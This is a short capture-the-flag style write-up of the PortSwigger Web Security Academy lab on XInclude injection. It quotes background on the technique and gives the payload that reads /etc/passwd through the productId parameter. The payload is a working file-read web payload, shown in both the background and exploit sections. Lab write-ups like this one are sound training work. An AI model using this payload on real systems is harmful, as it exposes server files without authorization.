# Lab: Exploiting `XInclude` to retrieve files ###### tags: `Portswigger Web Security Academy` `Web` * Description: This lab has a "Check stock" feature that embeds the user input inside a server-side XML document that is subsequently parsed. Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack. * Goal: To solve the lab, inject an `XInclude` statement to retrieve the contents of the /etc/passwd file. * Hint: By default, `XInclude` will try to parse the included document as XML. Since /etc/passwd isn't valid XML, you will need to add an extra attribute to the `XInclude` directive to change this behavior. ## Background > XInclude is a part of the XML specification that allows an XML document to be built from sub documents You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server side XML document > > To perform an XInclude attack you need to reference the XInclude namespace and provide the path to the file that you wish to include > >For example: > ```xml! > <foo xmlns:xi="http://www.w3.org/2001/XInclude"> > <xi:include parse="text" href="file:///etc/passwd"/></foo> > ``` --- [淺析xml之xinclude & xslt](https://lonelysec.com/%E6%B7%BA%E6%9E%90xml%E4%B9%8Bxinclude-xslt/) >xinclude可以理解為xml include熟悉編譯腳本語言的一定熟知，像php的include，python和java的import都是可以進行檔案包含的。 ## Recon In this lab, the package did not contain the xml format data so I can't control DTD to launch a classic XXE. Therefore, we can use xinclude?  ## Exp Just use the payload at background section and replace `productID`'s data to exploited payload. $\to$ ```xml! productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"> <xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1 ``` :::spoiler Success Screenshot  ---  ::: ## Reference